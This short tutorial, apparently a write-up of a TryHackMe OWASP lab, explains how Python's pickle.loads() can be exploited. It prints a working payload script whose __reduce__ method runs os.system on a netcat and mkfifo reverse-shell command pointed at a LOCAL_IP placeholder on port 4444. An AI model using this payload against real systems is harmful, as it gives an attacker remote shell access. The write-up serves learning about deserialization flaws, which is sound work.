One way to attack Python webapps is to exploit pickles, and in particular the pickle.loads() operation which reconstructs objects from an encoded data stream. When an object is reconstructed it is actually fully initialized, which means that things like object.__reduce__() are run.
For example, the TryHackMe’s OWASP Top 10 room has us use the following code to create a malicious base64 encoded object to feed pickle.loads() (LOCAL_IP gets replaced by your machine’s IP):
import pickle
import sys
import base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc LOCAL_IP 4444 > /tmp/f'
class rce(object):
def __reduce__(self):
import os
return (os.system,(command,))
print(base64.b64encode(pickle.dumps(rce())))What’s getting encoded here is the rce class. Python will call rce.__reduce__() to determine how to initialize this class when pickle.loads() deserializes it, and __reduce__() will return the tuple (os.system, (command,)), where command is basically our standard Metasploit reverse shell. Python then initializes the class by using os.system to call command, and there’s our reverse shell!